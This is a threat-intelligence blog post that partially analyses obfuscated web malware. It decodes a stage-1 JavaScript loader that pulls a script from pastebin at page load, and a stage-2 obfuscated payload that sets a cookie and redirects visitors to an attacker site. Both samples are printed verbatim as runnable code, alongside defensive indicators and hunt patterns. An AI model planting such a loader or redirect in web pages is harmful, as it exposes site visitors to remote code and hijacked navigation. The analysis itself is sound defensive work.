Analysis of Obfuscated PHP Malware

January 29, 2019 - A partial analysis of some obfuscated PHP.

I monitor a PHP decoder site (linked here) and was alerted when a decoded PHP sample (linked here) contained a String.fromCharCode call. Decoding its character codes (104, 116, 116, 112, 115, 58, 47, 47, 103, 101, 116, 109, 121, 99, 111, 110, 102, 105, 103, 112, 108, 101, 97, 115, 101, 46, 99, 111, 109, 47, 103, 101, 116, 46, 112, 104, 112)[1] produces https://getmyconfigplease[.]com/get[.]php. The content served by that site looks like:

// Stage-1 loader as served by getmyconfigplease[.]com/get[.]php, kept verbatim for analysis.
// It creates a <script> element, hides the src behind String.fromCharCode (the codes spell
// out the pastebin raw URL given below), and appends it to <head>, so the next stage is
// fetched and executed at page load. The only network indicator at this stage is the
// script src host; the variable name is random and not a useful signature.
var sECIQY8TzC = document.createElement('script'); sECIQY8TzC.type = 'text/javascript'; sECIQY8TzC.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 112, 97, 115, 116, 101, 98, 105, 110, 46, 99, 111, 109, 47, 114, 97, 119, 47, 69, 110, 78, 75, 113, 71, 76, 78); document.head.appendChild(sECIQY8TzC);

Decoding the String.fromCharCode argument[2] produces https://pastebin.com/raw/EnNKqGLN.

The content of this site is:

// Stage-2 payload (pastebin raw EnNKqGLN), kept byte-for-byte; the annotations below were
// derived by hand-evaluating the string tables rather than running the sample.
//
// Layer 1: _0x11da69 is a table of 13 base64 strings. The IIFE rotates it in place:
//   _0x350dbc(++0xd5) loops 213 times doing push(shift()), and 213 mod 13 == 5, so every
//   index is shifted by 5. _0x4097a7(i) then base64-decodes entry i (via a lazy atob
//   polyfill, with Function('return this') used to reach the global object when window
//   is not available) and caches the result in _0x4097a7['KYlgqs'].
//   After rotation the table decodes to:
//     0:'replace' 1:'location' 2:'indexOf' 3:'cookie'
//     4:'BestCookie=true; max-age=20400' 5:'shift' 6:'0x0' 7:'0x1'
//     8:'0x2' 9:'0x3' 10:'0x4' 11:'0x6' 12:'href'
//
// Layer 2: _0x2be368 is a second 7-entry table built from layer 1 plus the literals
//   'fromCharCode' and 'BestCookie=true'. It is rotated the same way: _0x42951f(++0x1c9)
//   loops 457 times and 457 mod 7 == 2. _0x4755cb(i) is a plain lookup into it.
//
// Resolved, _0x443bde == ['fromCharCode', 'BestCookie=true', 'indexOf', 'cookie',
//   'BestCookie=true; max-age=20400', 'replace', 'location', 'href'].
//
// _0x4efd8b is String.fromCharCode(...) over the hex codes, i.e. the redirect target
//   https://formylittlesite[.]xyz/little[.]php (defanged here; the hex is in the code).
//
// Effective behaviour of the final block:
//   if (document.cookie.indexOf('BestCookie=true') == -1) {
//     document.cookie = 'BestCookie=true; max-age=20400';   // ~5 h 40 min
//     window.location.replace(url); document.location.replace(url);
//     window.location.href = url;   document.location.href = url;
//   }
// i.e. a cookie-gated, once-per-expiry redirect of visitors to the attacker's site,
// with four redundant navigation calls so that at least one takes effect.
//
// Defender notes: the cookie name 'BestCookie' and the two hostnames above are the
// reusable indicators; the identifier names are randomised per build and are not.
// The Function('return this')/atob-polyfill prologue is a common obfuscator template
// and is a reasonable hunt pattern on its own.
function _0x16ac9e(){var _0x11da69=['MHgy','MHgz','MHg0','MHg2','aHJlZg==','cmVwbGFjZQ==','bG9jYXRpb24=','aW5kZXhPZg==','Y29va2ll','QmVzdENvb2tpZT10cnVlOyBtYXgtYWdlPTIwNDAw','c2hpZnQ=','MHgw','MHgx'];(function(_0x538417,_0x48f8ea){var _0x350dbc=function(_0x2e576b){while(--_0x2e576b){_0x538417['push'](_0x538417['shift']());}};_0x350dbc(++_0x48f8ea);}(_0x11da69,0xd5));var _0x4097a7=function(_0x506a3d,_0x321114){_0x506a3d=_0x506a3d-0x0;var _0x32b6f7=_0x11da69[_0x506a3d];if(_0x4097a7['cNcBaR']===undefined){(function(){var _0x29eb7d;try{var _0x4e84d1=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');_0x29eb7d=_0x4e84d1();}catch(_0x476c5c){_0x29eb7d=window;}var _0x3b1078='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x29eb7d['atob']||(_0x29eb7d['atob']=function(_0x2199f9){var _0x207876=String(_0x2199f9)['replace'](/=+$/,'');for(var _0x3d686c=0x0,_0x55acec,_0x22a388,_0x5795eb=0x0,_0x5c30ef='';_0x22a388=_0x207876['charAt'](_0x5795eb++);~_0x22a388&&(_0x55acec=_0x3d686c%0x4?_0x55acec*0x40+_0x22a388:_0x22a388,_0x3d686c++%0x4)?_0x5c30ef+=String['fromCharCode'](0xff&_0x55acec>>(-0x2*_0x3d686c&0x6)):0x0){_0x22a388=_0x3b1078['indexOf'](_0x22a388);}return _0x5c30ef;});}());_0x4097a7['qogRBP']=function(_0xd61dcf){var _0x10ae9e=atob(_0xd61dcf);var _0x3a9531=[];for(var _0x3a6320=0x0,_0x8d019b=_0x10ae9e['length'];_0x3a6320<_0x8d019b;_0x3a6320++){_0x3a9531+='%'+('00'+_0x10ae9e['charCodeAt'](_0x3a6320)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x3a9531);};_0x4097a7['KYlgqs']={};_0x4097a7['cNcBaR']=!![];}var _0x579681=_0x4097a7['KYlgqs'][_0x506a3d];if(_0x579681===undefined){_0x32b6f7=_0x4097a7['qogRBP'](_0x32b6f7);_0x4097a7['KYlgqs'][_0x506a3d]=_0x32b6f7;}else{_0x32b6f7=_0x579681;}return _0x32b6f7;};var _0x2be368=[_0x4097a7('0x0'),_0x4097a7('0x1'),'fromCharCode','BestCookie=true',_0x4097a7('0x2'),_0x4097a7('0x3'),_0x4097a7('0x4')];(function(_0x6e5b15,_0x2c75a3){var 
_0x42951f=function(_0x1975b5){while(--_0x1975b5){_0x6e5b15['push'](_0x6e5b15[_0x4097a7('0x5')]());}};_0x42951f(++_0x2c75a3);}(_0x2be368,0x1c9));var _0x4755cb=function(_0x5ad1ee,_0x39c6df){_0x5ad1ee=_0x5ad1ee-0x0;var _0x38bd4b=_0x2be368[_0x5ad1ee];return _0x38bd4b;};var _0x443bde=[_0x4755cb(_0x4097a7('0x6')),_0x4755cb(_0x4097a7('0x7')),_0x4755cb(_0x4097a7('0x8')),_0x4755cb(_0x4097a7('0x9')),_0x4755cb(_0x4097a7('0xa')),_0x4755cb('0x5'),_0x4755cb(_0x4097a7('0xb')),_0x4097a7('0xc')];var _0x4efd8b=String[_0x443bde[0x0]](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x66,0x6f,0x72,0x6d,0x79,0x6c,0x69,0x74,0x74,0x6c,0x65,0x73,0x69,0x74,0x65,0x2e,0x78,0x79,0x7a,0x2f,0x6c,0x69,0x74,0x74,0x6c,0x65,0x2e,0x70,0x68,0x70);if(document[_0x443bde[0x3]][_0x443bde[0x2]](_0x443bde[0x1])==-0x1){document[_0x443bde[0x3]]=_0x443bde[0x4];window[_0x443bde[0x6]][_0x443bde[0x5]](_0x4efd8b);document[_0x443bde[0x6]][_0x443bde[0x5]](_0x4efd8b);window[_0x443bde[0x6]][_0x443bde[0x7]]=_0x4efd8b;document[_0x443bde[0x6]][_0x443bde[0x7]]=_0x4efd8b;}}_0x16ac9e();

I have not fully analyzed this yet; I hope to do so soon and update this page.

This project was facilitated by Biblioteca… more information on this project is coming soon.


  • Threat Intelligence
  • Threat Hunting
  • Biblioteca